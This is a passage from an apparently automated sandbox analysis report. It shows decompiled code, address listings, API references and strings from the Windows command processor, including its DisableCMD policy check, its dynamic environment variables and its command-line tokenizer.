											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
												goto L14;
											}
											goto L8;
										}
										E00D906C0(0);
										_t53 = GetConsoleOutputCP();
										 *0xdb3854 = _t53;
										GetCPInfo(_t53, 0xdb3840);
										_t44 = E00D9465D(0);
										_t82 =  *0xdc3ccc;
										L10:
										_t106 = _t82;
										if(_t82 == 0) {
											 *0xdc8058 = 0;
											goto L29;
										} else {
											goto L11;
										}
										do {
											L11:
										} while (E00D94B60(_t106, 0) == 0);
										_push(_v28);
										goto L13;
									}
									EnterCriticalSection( *0xdb3858);
									 *0xdad544 = 0;
									LeaveCriticalSection( *0xdb3858);
									_t59 = GetConsoleOutputCP();
									 *0xdb3854 = _t59;
									GetCPInfo(_t59, 0xdb3840);
									E00D9465D(_t86);
									E00D90E00(0, _t96);
									 *0xdad59c = 0;
									E00D906C0(0);
									_t64 = GetConsoleOutputCP();
									 *0xdb3854 = _t64;
									GetCPInfo(_t64, 0xdb3840);
									E00D9465D(0);
									do {
										goto L40;
									} while (_t96 == 1);
									goto L41;
									L40:
									 *0xdad590 = 0;
									EnterCriticalSection( *0xdb3858);
									 *0xdad544 = 0;
									LeaveCriticalSection( *0xdb3858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E00D8EEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
								}
							}
							_push(0);
							_push(0x40002729);
							E00D8C108(_t84);
							E00DA3BB0(__eflags, 0);
							do {
								__eflags = E00D94B60(__eflags, 0);
							} while (__eflags == 0);
							_push(_t96);
							goto L13;
						}
						__eflags = _t44 - _t97;
						if(__eflags != 0) {
							goto L33;
						} else {
							goto L31;
						}
						do {
							L31:
							__eflags = E00D94B60(__eflags, 0);
						} while (__eflags == 0);
						goto L25;
					}
					_push(0);
					_push(0xdbb8b8);
					L00D982C1();
					_t82 =  *0xdc3ccc;
					if(_t44 != 0) {
						_t44 = 1;
						_v44 = 1;
						__eflags = _t82;
						if(__eflags != 0) {
							_v28 = 0xff;
						}
					} else {
						_t44 = _v44;
					}
					if(_t44 != 0) {
						goto L10;
					} else {
						_t97 = 0;
						goto L7;
					}
				}
			}

0x00d94504
0x00d9450b
0x00d94513
0x00d94529
0x00d9452e
0x00d94538
0x00d94541
0x00d9455d
0x00d9e6ee
0x00d9e707
0x00d9e710
0x00d9e710
0x00d94566
0x00d9456d
0x00d94572
0x00d94577
0x00d9457f
0x00d94581
0x00d94587
0x00d9458e
0x00d94591
0x00d94594
0x00d94598
0x00d94599
0x00d9459a
0x00d9459b
0x00d945a4
0x00d9e71b
0x00d9e71c
0x00d9e721
0x00d9e729
0x00d9e72e
0x00d9e734
0x00d9e734
0x00d9e738
0x00000000
0x00d945aa
0x00d945aa
0x00d945b1
0x00d9e77f
0x00d9e77f
0x00d9e785
0x00d9e78a
0x00d9e78e
0x00d9e791
0x00d9e792
0x00d9e794
0x00d9e7a6
0x00d9e7a6
0x00d9e7a9
0x00d9e7d0
0x00d9e7d5
0x00d9e7d7
0x00d9e7db
0x00d9e7e2
0x00d9e7e9
0x00d9e7e9
0x00d9e7eb
0x00d9e7f0
0x00d9e7f0
0x00d9e7f6
0x00d9e7fc
0x00d9e808
0x00d9e80e
0x00d9e815
0x00d9e817
0x00d9e81e
0x00d9e820
0x00d9e823
0x00000000
0x00000000
0x00d9e825
0x00d9e825
0x00d9e828
0x00d9e899
0x00d9e89f
0x00d9e89f
0x00d9e762
0x00d9e762
0x00d94625
0x00d94625
0x00d9462b
0x00d94634
0x00d9463c
0x00d9e768
0x00d9e76e
0x00d9e76e
0x00d9e772
0x00000000
0x00d9e772
0x00d94645
0x00d9e758
0x00d9e75e
0x00d9e75e
0x00000000
0x00d9e758
0x00d9464b
0x00d9464f
0x00d94656
0x00d94658
0x00d94658
0x00d945e3
0x00d945e3
0x00d945e7
0x00d945db
0x00d945db
0x00d945e1
0x00000000
0x00000000
0x00000000
0x00d945e1
0x00d945e9
0x00d945ee
0x00d945fa
0x00d945ff
0x00d94605
0x00d9460a
0x00d94610
0x00d94610
0x00d94612
0x00d9e779
0x00000000
0x00000000
0x00000000
0x00000000
0x00d94618
0x00d94618
0x00d9461e
0x00d94622
0x00000000
0x00d94622
0x00d9e830
0x00d9e83c
0x00d9e842
0x00d9e848
0x00d9e854
0x00d9e859
0x00d9e85f
0x00d9e868
0x00d9e86d
0x00d9e873
0x00d9e878
0x00d9e884
0x00d9e889
0x00d9e88f
0x00d9e7f0
0x00000000
0x00000000
0x00000000
0x00d9e7f0
0x00d9e7f6
0x00d9e7fc
0x00d9e808
0x00d9e80e
0x00d9e815
0x00d9e817
0x00d9e81e
0x00d9e820
0x00d9e820
0x00d9e7f0
0x00d9e7ab
0x00d9e7ac
0x00d9e7b1
0x00d9e7b9
0x00d9e7be
0x00d9e7c4
0x00d9e7c4
0x00d9e7c8
0x00000000
0x00d9e7c8
0x00d9e796
0x00d9e798
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9e79a
0x00d9e79a
0x00d9e7a0
0x00d9e7a0
0x00000000
0x00d9e7a4
0x00d945b7
0x00d945b8
0x00d945bd
0x00d945c4
0x00d945cc
0x00d9e744
0x00d9e745
0x00d9e748
0x00d9e74a
0x00d9e750
0x00d9e750
0x00d945d2
0x00d945d2
0x00d945d2
0x00d945d7
0x00000000
0x00d945d9
0x00d945d9
0x00000000
0x00d945d9
0x00d945d7

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D94516
OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00D94523

Part of subcall function 00D9465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,00D94533), ref: 00D94687
Part of subcall function 00D9465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,00D94533), ref: 00D946A7

HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00D94538
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00D94555
_setjmp3.MSVCRT ref: 00D945BD
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00D945EE
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00DB3840), ref: 00D945FF
exit.MSVCRT ref: 00D94625
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 00D9E707
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D9E710

Part of subcall function 00D94719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,00D9D822,?,00000000,00000000), ref: 00D94770
Part of subcall function 00D94719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,00D9D822,?,00000000,00000000), ref: 00D9478C

Part of subcall function 00D946D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D9458C), ref: 00D946D8
Part of subcall function 00D946D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00DB3840), ref: 00D946E9
Part of subcall function 00D946D8: memset.MSVCRT ref: 00D94703

Part of subcall function 00D93D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00DB385C), ref: 00D93D4B
Part of subcall function 00D93D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D93D57
Part of subcall function 00D93D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D93D6B
Part of subcall function 00D93D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00DA6D90,00000001), ref: 00D93D78
Part of subcall function 00D93D27: _get_osfhandle.MSVCRT ref: 00D93D85
Part of subcall function 00D93D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D93D8D
Part of subcall function 00D93D27: _get_osfhandle.MSVCRT ref: 00D93D99
Part of subcall function 00D93D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D93DA1
Part of subcall function 00D93D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D93DC7
Part of subcall function 00D93D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D93E02

_setjmp3.MSVCRT ref: 00D9E785

Strings

Software\Policies\Microsoft\Windows\System, xrefs: 00D9454B
DisableCMD, xrefs: 00D9E6FF

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 4268540630-1920437939
Opcode ID: fe838c471069830add1220f75625add4dbad7bd83347a824713dc2cf136eae82
Instruction ID: c15b5477ca55435769ac27f9a7a0251bd2410271183495de89a518d9fc8c6957
Opcode Fuzzy Hash: fe838c471069830add1220f75625add4dbad7bd83347a824713dc2cf136eae82
Instruction Fuzzy Hash: 3471BC71500306FFEF10EFB4AC99EAEB7A9EB45714B180429F502E2292DF70D9059775

Uniqueness

Uniqueness Score: -1.00%

Function 00D8CFBC, Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 141COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DAF830,00002000,?,?,?,?,?,00D9373A,00D8590A,00000000), ref: 00D8CFDF
_wcsicmp.MSVCRT ref: 00D8D005
_wcsicmp.MSVCRT ref: 00D8D01B
_wcsicmp.MSVCRT ref: 00D8D031
_wcsicmp.MSVCRT ref: 00D8D047
_wcsicmp.MSVCRT ref: 00D8D05D
_wcsicmp.MSVCRT ref: 00D8D073
_wcsicmp.MSVCRT ref: 00D8D085
_wcsicmp.MSVCRT ref: 00D8D09B

Part of subcall function 00D896A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00DAF830,?,00002000), ref: 00D896CC
Part of subcall function 00D896A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D896E0
Part of subcall function 00D896A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D896F4
Part of subcall function 00D896A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D89708

Strings

TIME, xrefs: 00D8D06D
ERRORLEVEL, xrefs: 00D8D015
DATE, xrefs: 00D8D057
RANDOM, xrefs: 00D8D07F
HIGHESTNUMANODENUMBER, xrefs: 00D8D095
CMDCMDLINE, xrefs: 00D8D041
CMDEXTVERSION, xrefs: 00D8D02B
0rUtPH`t, xrefs: 00D9B546

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
String ID: 0rUtPH`t$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
API String ID: 2447294730-891249205
Opcode ID: b68808cac174c1490c65686438fe169f0bb6f1b3160c37177dc9d98d12056c2c
Instruction ID: 3af45e651b8f764b80d09d6fb7eca566d42abfaa91f79fc02ae830eed430cae4
Opcode Fuzzy Hash: b68808cac174c1490c65686438fe169f0bb6f1b3160c37177dc9d98d12056c2c
Instruction Fuzzy Hash: 5231B236218703AFAB247735AC1EE7BB79ADF86320B19441AF542D02D1EF35D4028775

Uniqueness

Uniqueness Score: -1.00%

Function 00D8F300, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00D8F300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
				signed short* _v8;
				intOrPtr _v12;
				signed short* _v16;
				long _v20;
				signed int _t92;
				signed int _t102;
				signed int _t109;
				signed char _t110;
				int _t111;
				wchar_t* _t112;
				wchar_t* _t113;
				int _t114;
				signed int _t120;
				long _t121;
				int _t122;
				wchar_t* _t123;
				signed int _t129;
				int _t130;
				signed int _t135;
				int _t136;
				signed int _t139;
				signed short* _t141;
				int _t148;
				long _t152;
				int _t153;
				int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				int _t164;
				wchar_t* _t165;
				wchar_t* _t166;
				signed short* _t167;
				signed int _t169;
				signed int _t173;
				long* _t174;
				long* _t180;
				long* _t181;
				intOrPtr _t182;
				long* _t183;
				long _t184;
				long _t185;
				long _t186;
				long _t187;
				void* _t188;
				void* _t189;
				void* _t192;

				_t175 = __ecx;
				_t92 = __eax;
				_push(0);
				_push(0xdbb8f8);
				_v12 = __edx;
				_v8 = __ecx;
				L00D982C1();
				_t189 = _t188 + 8;
				if(__eax != 0) {
					L139:
					return _t92 | 0xffffffff;
				}
				_t180 = _v8;
				if(_t180 == 0) {
					if( *0xdbf984 != 0) {
						_push( *0xdbb8a0);
						E00D925D9(L"Ungetting: \'%s\'\n");
					}
					 *0xdbb8a4 =  *0xdbb8a0;
					return 0;
				} else {
					if(_v12 < 6) {
						goto L139;
					}
					_t169 = _a4;
					 *0xdbb8a0 =  *0xdbb8a4;
					_v16 = _t180;
					if((_t169 & 0x00000021) == 0) {
						while(1) {
							_t187 = E00D8F9D5(_t175) & 0x0000ffff;
							_t164 = iswspace(_t187);
							_t189 = _t189 + 4;
							if(_t164 != 0 && _t187 != 0xa) {
								goto L6;
							} else {
								continue;
							}
							do {
								_t187 = E00D8F9D5(_t175) & 0x0000ffff;
								_t164 = iswspace(_t187);
								_t189 = _t189 + 4;
							} while (_t164 != 0 && _t187 != 0xa);
							L6:
							if((_t169 & 0x00000004) != 0) {
								_t165 = 0xd82102;
							} else {
								_t165 = L"=,;";
							}
							_t166 = wcschr(_t165, _t187);
							_t189 = _t189 + 8;
							if(_t166 != 0) {
								if(_t187 == 0) {
									goto L9;
								} else {
									continue;
								}
							}
							L9:
							_t167 =  *0xdbb8a4;
							if(_t167 != 0xdb3890) {
								 *0xdbb8a4 = _t167 - 2;
							}
							goto L11;
						}
					}
					L11:
					_t184 = E00D8F9D5(_t175) & 0x0000ffff;
					if( *0xdad5b4 != 0) {
						 *0xdad5b4 = 0;
						if((_t169 & 0x00000040) != 0) {
							goto L41;
						} else {
							_t184 = E00D8F9D5(_t175) & 0x0000ffff;
							goto L12;
						}
						goto L140;
					} else {
						L12:
						_t129 = _t184 & 0x0000ffff;
						if(_t129 != 0xa) {
							if(_t129 >= 0x41) {
								if(_t129 >= 0x7c) {
									goto L25;
								} else {
									goto L33;
								}
							} else {
								L25:
								if(_t129 > 0x7c) {
									goto L33;
								} else {
									_t16 = _t129 + 0xd8f8c0; // 0x5050500
									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M00D8F8A8))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											L27:
											if((_t169 & 0x0000002a) == 8) {
												goto L28;
											}
											goto L33;
										case 3:
											L28:
											if((_t169 & 0x00000022) == 0) {
												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
													goto L13;
												} else {
												}
											}
											goto L33;
										case 4:
											if((__bl & 0x00000022) != 0) {
												goto L33;
											} else {
												if( *0xdad548 != 0) {
													goto L27;
												} else {
													goto L41;
												}
											}
											goto L140;
										case 5:
											goto L33;
									}
								}
							}
						} else {
							L13:
							_t169 = _t169 & 0xffffffdd;
							_a4 = _t169;
							L14:
							if((_t169 & 0x00000022) == 0) {
								L15:
								 *_t180 = _t184;
								_t183 =  &(_t180[0]);
								_v8 = _t183;
								_t174 = _t183;
								_t136 = iswdigit(_t184);
								_t192 = _t189 + 4;
								if(_t136 != 0) {
									_t184 = E00D8F9D5(_t175) & 0x0000ffff;
									_t174 =  &(_t183[0]);
									 *_t183 = _t184;
									_t183 = _t174;
									_v8 = _t183;
								}
								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
									_t139 = E00D8F9D5(_t175) & 0x0000ffff;
									if(_t139 ==  *(_t183 - 2)) {
										 *_t183 = _t139;
										_t183 =  &(_t174[0]);
										_v8 = _t183;
										_t139 = E00D8F9D5(_t175) & 0x0000ffff;
										_t174 = _t183;
									}
									_t176 =  *(_t183 - 2) & 0x0000ffff;
									if(_t176 != 0x3e) {
										if(_t176 != 0x3c) {
											goto L79;
										}
										goto L78;
									} else {
										L78:
										if(_t139 == 0x26) {
											 *_t183 = 0x26;
											_t183 =  &(_t174[0]);
											_v8 = _t183;
											goto L109;
											do {
												do {
													L109:
													_t186 = E00D8F9D5(_t176) & 0x0000ffff;
													_t148 = iswspace(_t186);
													_t192 = _t192 + 4;
												} while (_t148 != 0);
												_t176 = L"=,;";
											} while (E00D8D7D4(L"=,;", _t186) != 0);
											if(iswdigit(_t186) != 0) {
												 *_t183 = _t186;
												_t183 =  &(_t183[0]);
												_v8 = _t183;
												E00D8F9D5(_t176);
											}
										}
										L79:
										_t141 =  *0xdbb8a4;
										if(_t141 != 0xdb3890) {
											 *0xdbb8a4 = _t141 - 2;
										}
										goto L20;
									}
								} else {
									L20:
									 *_t183 = 0;
									return  *_v16 & 0x0000ffff;
								}
							}
							L33:
							if(_t184 == 0x5e) {
								if((_t169 & 0x00000022) != 0) {
									goto L34;
								} else {
									_t184 = E00D8F9D5(_t175) & 0x0000ffff;
									if(_t184 == 0) {
										goto L15;
									}
									if(_t184 != 0xa) {
										goto L41;
									} else {
										_t184 = E00D8F9D5(_t175) & 0x0000ffff;
										if(_t184 != 0) {
											goto L41;
										} else {
											goto L15;
										}
									}
								}
								goto L140;
							} else {
								L34:
								if(_t184 == 0x22) {
									_t169 = _t169 ^ 0x00000002;
									_a4 = _t169;
								}
								if((_t169 & 0x00000023) == 0) {
									_t155 = iswspace(_t184);
									_t189 = _t189 + 4;
									if(_t155 != 0) {
										goto L15;
									}
									if((_t169 & 0x00000004) != 0) {
										_t156 = 0xd82102;
									} else {
										_t156 = L"=,;";
									}
									_t157 = wcschr(_t156, _t184);
									_t189 = _t189 + 8;
									if(_t157 != 0) {
										goto L15;
									}
								}
								_t130 = iswdigit(_t184);
								_t189 = _t189 + 4;
								if(_t130 != 0) {
									_t175 =  *0xdbb8a4;
									if((_t175 - 0xdb388e & 0xfffffffe) < 4) {
										L88:
										_t135 =  *_t175 & 0x0000ffff;
										if(_t135 != 0x3e) {
											if(_t135 != 0x3c) {
												goto L41;
											} else {
												goto L89;
											}
										} else {
											L89:
											if((_t169 & 0x00000022) == 0) {
												goto L15;
											}
											goto L41;
										}
									} else {
										_t152 =  *(_t175 - 4) & 0x0000ffff;
										_v20 = _t152;
										_t153 = iswspace(_t152);
										_t189 = _t189 + 4;
										if(_t153 == 0) {
											_t175 = L"()|&=,;\"";
											if(E00D8D7D4(L"()|&=,;\"", _v20) == 0) {
												goto L41;
											} else {
												goto L87;
											}
										} else {
											L87:
											_t175 =  *0xdbb8a4;
											goto L88;
										}
									}
									goto L140;
								}
							}
						}
					}
					L41:
					 *_t180 = _t184;
					_t181 =  &(_t180[0]);
					_a4 = _t169 | 0x00000040;
					 *0xdad548 = 0;
					_t173 = _t181 - _v16 >> 1;
					while(1) {
						_v8 = _t181;
						_t185 = E00D8F9D5(_t175) & 0x0000ffff;
						if( *0xdad5b4 != 0) {
							goto L131;
						}
						L43:
						_t109 = _t185 & 0x0000ffff;
						if(_t109 < 0x41 || _t109 >= 0x7c) {
							if(_t109 > 0x7c) {
								goto L45;
							} else {
								_t34 = _t109 + 0xd8f958; // 0x5050500
								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M00D8F940))) {
									case 0:
										_t127 = _a4;
										goto L54;
									case 1:
										__eax = _a4;
										goto L55;
									case 2:
										__eax = _a4;
										goto L114;
									case 3:
										L101:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if((__al & 0x00000010) != 0) {
												L54:
												_t102 = _t127 & 0xffffffdd;
												_a4 = _t102;
												L55:
												if((_t102 & 0x00000022) != 0) {
													goto L45;
												}
												goto L62;
											} else {
												if(__si == 0x29) {
													goto L45;
												} else {
													goto L54;
												}
											}
										}
										goto L140;
									case 4:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if( *0xdad548 == 0) {
												goto L49;
											} else {
												L114:
												__al = __al & 0x0000002a;
												if(__al != 8) {
													goto L45;
												} else {
													goto L101;
												}
											}
										}
										goto L140;
									case 5:
										goto L45;
								}
							}
						} else {
							L45:
							_t110 = _a4;
							if(_t185 == 0x5e) {
								if((_t110 & 0x00000022) != 0) {
									goto L46;
								} else {
									_t185 = E00D8F9D5(_t175) & 0x0000ffff;
									if(_t185 == 0) {
										goto L61;
									} else {
										if(_t185 != 0xa) {
											goto L49;
										} else {
											_t185 = E00D8F9D5(_t175) & 0x0000ffff;
											if(_t185 == 0) {
												goto L61;
											} else {
												goto L49;
											}
										}
									}
								}
								goto L140;
							} else {
								L46:
								if(_t185 == 0x22) {
									_t110 = _t110 ^ 0x00000002;
									_a4 = _t110;
								}
								if((_t110 & 0x00000023) == 0) {
									_t111 = iswspace(_t185);
									_t189 = _t189 + 4;
									if(_t111 != 0) {
										goto L61;
									} else {
										if((_a4 & 0x00000004) != 0) {
											_t112 = 0xd82102;
										} else {
											_t112 = L"=,;";
										}
										_t113 = wcschr(_t112, _t185);
										_t189 = _t189 + 8;
										if(_t113 == 0) {
											goto L48;
										} else {
											goto L61;
										}
									}
								} else {
									L48:
									_t114 = iswdigit(_t185);
									_t189 = _t189 + 4;
									if(_t114 != 0) {
										_t175 =  *0xdbb8a4;
										if((_t175 - 0xdb388e & 0xfffffffe) < 4) {
											L70:
											_t120 =  *( *0xdbb8a4) & 0x0000ffff;
											if(_t120 == 0x3e || _t120 == 0x3c) {
												_t102 = _a4;
												if((_t102 & 0x00000022) == 0) {
													goto L62;
												} else {
													goto L49;
												}
											} else {
												goto L49;
											}
										} else {
											_t121 =  *(_t175 - 4) & 0x0000ffff;
											_v20 = _t121;
											_t122 = iswspace(_t121);
											_t189 = _t189 + 4;
											if(_t122 != 0) {
												goto L70;
											} else {
												_t123 = wcschr(L"()|&=,;\"", _v20);
												_t189 = _t189 + 8;
												if(_t123 == 0) {
													goto L49;
												} else {
													goto L70;
												}
											}
										}
										goto L140;
									} else {
										L49:
										if(_t173 >= _v12 - 1) {
											L61:
											_t102 = _a4;
										} else {
											 *_t181 = _t185;
											_t181 =  &(_t181[0]);
											_t173 = _t173 + 1;
											continue;
										}
									}
								}
							}
						}
						L62:
						_a4 = _t102 & 0xffffffbf;
						 *_t181 = 0;
						_t182 = _v12;
						_t47 = _t182 - 1; // 0x3
						if(_t173 < _t47) {
							_t175 =  *0xdbb8a4;
							if( *0xdbb8a4 != 0xdb3890) {
								 *0xdbb8a4 =  *0xdbb8a4 - 2;
							}
						}
						if(_t173 >= _t182) {
							if(_t185 != 0xffff) {
								_t92 = E00D8C5A2(_t175, 0x234f, 1, _v16);
								goto L139;
							}
						}
						return 0x4000;
						goto L140;
						L131:
						 *0xdad5b4 = 0;
						if((_a4 & 0x00000040) != 0) {
							goto L49;
						} else {
							_t185 = E00D8F9D5(_t175) & 0x0000ffff;
							goto L43;
						}
						goto L140;
					}
				}
				goto L140;
			}

0x00d8f300
0x00d8f300
0x00d8f30b
0x00d8f30d
0x00d8f312
0x00d8f315
0x00d8f318
0x00d8f31d
0x00d8f322
0x00d9c593
0x00000000
0x00d9c593
0x00d8f328
0x00d8f32d
0x00d8f432
0x00d9c4dc
0x00d9c4e7
0x00d9c4ec
0x00d8f43d
0x00d8f44a
0x00d8f333
0x00d8f337
0x00000000
0x00000000
0x00d8f33d
0x00d8f345
0x00d8f34a
0x00d8f350
0x00d8f352
0x00d8f357
0x00d8f35b
0x00d8f361
0x00d8f366
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f352
0x00d8f357
0x00d8f35b
0x00d8f361
0x00d8f364
0x00d8f36d
0x00d8f370
0x00d8f744
0x00d8f376
0x00d8f376
0x00d8f376
0x00d8f37d
0x00d8f383
0x00d8f388
0x00d8f6de
0x00000000
0x00d8f6e4
0x00000000
0x00d8f6e4
0x00d8f6de
0x00d8f38e
0x00d8f38e
0x00d8f398
0x00d8f39d
0x00d8f39d
0x00000000
0x00d8f398
0x00d8f352
0x00d8f3a2
0x00d8f3ae
0x00d8f3b1
0x00d9c4f4
0x00d9c501
0x00000000
0x00d9c507
0x00d9c50c
0x00000000
0x00d9c50c
0x00000000
0x00d8f3b7
0x00d8f3b7
0x00d8f3b7
0x00d8f3bd
0x00d8f450
0x00d8f48a
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f452
0x00d8f452
0x00d8f455
0x00000000
0x00d8f457
0x00d8f457
0x00d8f45e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f465
0x00d8f46b
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f46d
0x00d8f470
0x00d8f475
0x00000000
0x00000000
0x00d8f485
0x00d8f475
0x00000000
0x00000000
0x00d8f7bb
0x00000000
0x00d8f7c1
0x00d8f7c8
0x00000000
0x00d8f7ce
0x00000000
0x00d8f7ce
0x00d8f7c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f45e
0x00d8f455
0x00d8f3c3
0x00d8f3c3
0x00d8f3c3
0x00d8f3c6
0x00d8f3c9
0x00d8f3cc
0x00d8f3d2
0x00d8f3d2
0x00d8f3d5
0x00d8f3d9
0x00d8f3dc
0x00d8f3de
0x00d8f3e4
0x00d8f3e9
0x00d8f76d
0x00d8f770
0x00d8f773
0x00d8f776
0x00d8f778
0x00d8f778
0x00d8f3f3
0x00d8f681
0x00d8f688
0x00d8f6c6
0x00d8f6c9
0x00d8f6cc
0x00d8f6d4
0x00d8f6d7
0x00d8f6d7
0x00d8f68a
0x00d8f691
0x00d8f739
0x00000000
0x00000000
0x00000000
0x00d8f697
0x00d8f697
0x00d8f69b
0x00d8f7d8
0x00d8f7db
0x00d8f7de
0x00d8f7de
0x00d8f7e1
0x00d8f7e1
0x00d8f7e1
0x00d8f7e6
0x00d8f7ea
0x00d8f7f0
0x00d8f7f3
0x00d8f7f9
0x00d8f803
0x00d8f813
0x00d8f819
0x00d8f81c
0x00d8f81f
0x00d8f822
0x00d8f822
0x00d8f813
0x00d8f6a1
0x00d8f6a1
0x00d8f6ab
0x00d8f6b4
0x00d8f6b4
0x00000000
0x00d8f6ab
0x00d8f417
0x00d8f417
0x00d8f419
0x00000000
0x00d8f41f
0x00d8f3f3
0x00d8f48c
0x00d8f490
0x00d8f868
0x00000000
0x00d8f86e
0x00d8f873
0x00d8f879
0x00000000
0x00000000
0x00d8f882
0x00000000
0x00d8f888
0x00d9c519
0x00d9c51f
0x00000000
0x00d9c525
0x00000000
0x00d9c525
0x00d9c51f
0x00d8f882
0x00000000
0x00d8f496
0x00d8f496
0x00d8f49a
0x00d8f780
0x00d8f783
0x00d8f783
0x00d8f4a3
0x00d8f4a6
0x00d8f4ac
0x00d8f4b1
0x00000000
0x00000000
0x00d8f4ba
0x00d8f74e
0x00d8f4c0
0x00d8f4c0
0x00d8f4c0
0x00d8f4c7
0x00d8f4cd
0x00d8f4d2
0x00000000
0x00000000
0x00d8f4d2
0x00d8f4d9
0x00d8f4df
0x00d8f4e4
0x00d8f6e9
0x00d8f6ff
0x00d8f720
0x00d8f720
0x00d8f726
0x00d8f78e
0x00000000
0x00d8f794
0x00000000
0x00d8f794
0x00d8f728
0x00d8f728
0x00d8f72b
0x00000000
0x00000000
0x00000000
0x00d8f731
0x00d8f701
0x00d8f701
0x00d8f706
0x00d8f709
0x00d8f70f
0x00d8f714
0x00d8f890
0x00d8f89c
0x00000000
0x00d8f8a2
0x00000000
0x00d8f8a2
0x00d8f71a
0x00d8f71a
0x00d8f71a
0x00000000
0x00d8f71a
0x00d8f714
0x00000000
0x00d8f6ff
0x00d8f4e4
0x00d8f490
0x00d8f3bd
0x00d8f4ea
0x00d8f4ed
0x00d8f4f0
0x00d8f4f3
0x00d8f4f8
0x00d8f505
0x00d8f507
0x00d8f507
0x00d8f516
0x00d8f519
0x00000000
0x00000000
0x00d8f51f
0x00d8f51f
0x00d8f525
0x00d8f56d
0x00000000
0x00d8f56f
0x00d8f56f
0x00d8f576
0x00000000
0x00d8f57d
0x00000000
0x00000000
0x00d8f6be
0x00000000
0x00000000
0x00d8f82c
0x00000000
0x00000000
0x00d8f796
0x00d8f796
0x00d8f79b
0x00000000
